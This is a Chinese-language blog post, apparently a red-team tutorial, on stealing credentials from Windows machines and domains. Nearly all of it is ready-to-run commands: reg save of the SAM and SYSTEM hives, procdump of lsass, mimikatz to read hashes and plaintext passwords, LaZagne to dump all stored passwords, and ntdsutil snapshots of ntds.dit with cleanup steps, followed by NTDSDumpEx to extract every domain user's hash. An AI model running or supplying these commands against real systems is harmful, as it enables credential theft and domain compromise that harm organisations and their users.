linux幼儿园

  • 首页
  • 信息安全
    • 红队
    • 密码学
  • 软件
  • 硬件
  • 活动目录
  • 知识点
  • linux干货
  • linux命令集
    • 磁盘管理
    • 文档编辑
    • 设备管理
    • 网络通讯
    • 系统管理
    • 文件管理
    • 其他命令
  1. 首页
  2. 信息安全
  3. 正文

内网渗透之各种密码凭证窃取

2020年11月10日 53点热度 0人点赞 0条评论
密码窃取

注册表读取密码


注册表读取密码主要获取的是两个文件:

C
1
reg save HKLM\SYSTEM Sys.hivreg save HKLM\SAM Sam.hiv

导出注册表之后,我们可以通过mimikatz读取密码hash值:

C
1
mimikatz读取密码mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv " exit> hiv.txt

其中:NTLM加密的hash就是管理员登陆的加密密码!


lsass内存读取密码

lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略zhi。

要想读取内存的密码,前提是用户登陆过机器,登陆过就会在内存中停留:lsass.exe

使用工具:procdump.exe

C
1
procdump.exe -accepteula -ma lsass.exe lsass.dmp

然后再通过mimikatz读取:

08或者08以下的机器读取的是明文密码:测试机器是Windows server 2008

C
1
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"


LaZagne读取各类密码(浏览器等)

LaZagne是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(明文,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。

下载地址:

https://github.com/AlessandroZ/LaZagne

https://github.com/AlessandroZ/LaZagne/releases

C
1
获取所有密码:lazagne.exe all


获取域内所有用户hash

前提是拿到域控!

windows的密码是经过hash后存储的,本地存在hklm\sam,hklm\system注册表中。

域里面存在域控制器的c:\windows\ntds\ntds.dit中

ntds.dit其实就是一个esent数据库,微软本身就有一系列的文档化api能够操作这个数据库。

相关连接:https://msdn.microsoft.com/en-us/library/windows/desktop/gg294074.aspx

一:创建快照

创建快照 ,必须在域控服务器上操作:

C
1
ntdsutil snapshot "activate instance ntds" create quit quit

其中:成功生成快照集 {5347834e-33bd-4c0a-a54e-13947650ae18} 这里面的ID要记住!

二:挂载快照

C
1
ntdsutil snapshot "mount {5347834e-33bd-4c0a-a54e-13947650ae18}" quit quit

三:复制快照到本地

C
1
copy C:\$SNAP_202010141916_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

四:卸载快照(擦屁股)

C
1
ntdsutil snapshot "unmount {5347834e-33bd-4c0a-a54e-13947650ae18}" quit quit

五:删除快照

C
1
ntdsutil snapshot "delete {5347834e-33bd-4c0a-a54e-13947650ae18}" quit quit

六:获取key(用于解密)

通过注册表方式,吧key保存下来

C
1
reg save HKLM\SYSTEM c:\Sys.hiv

七:使用NTDSDumpEx获取所有域用户的hash

C
1
NTDSDumpEx.exe -d ntds.dit -o hash.txt -s Sys.hiv -h

hash.txt里面是所有域用户的账号和密码hash。


参考文章:

https://www.jianshu.com/p/e1990751bf84

https://github.com/AlessandroZ/LaZagnehttps://github.com/AlessandroZ/LaZagne/releases/

https://msdn.microsoft.com/en-us/library/windows/desktop/gg294074.aspx

本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
标签: 密码凭证
最后更新:2020年11月10日

jcghaier

from zero to hero

打赏 点赞
< 上一篇
下一篇 >

文章评论

取消回复
最新 热点 随机
最新 热点 随机
windows入侵检查流程 安全事件应急响应工具箱 利用腾讯轻量服务器搭建FRP服务 Windows局域网渗透(IPC$管道) 国内三大运营商宽带线路及分级介绍(联通篇) Windows Server 2012 R2 辅助域控制器搭建
windows入侵检查流程
fstrim命令 - 回收已挂载的文件系统未使用的块 head命令 - 显示文件开头内容 关于Apache Tomcat安全问题涉及的镜像及升级方法 bmodinfo命令 - 显示给定模块的详细信息 Netgear R6220 自己编译 Pandorabox 固件教程 seinfo命令 - 查询SELinux策略规则
标签聚合
tcp X.509 zabbix 勒索病毒 nmap Debian 深信服 CentOS 防火墙 iptables
书签
  • Linux就该这么学
  • pfschina.org
  • ruyo
  • 佐须之男
  • 大象笔记
  • 小陈博客
  • 我能过软考
  • 教父爱分享
  • 散尽浮华
  • 现代魔法学院

COPYRIGHT © 2020 linux幼儿园. ALL RIGHTS RESERVED.

THEME KRATOS MADE BY VTROIS

51la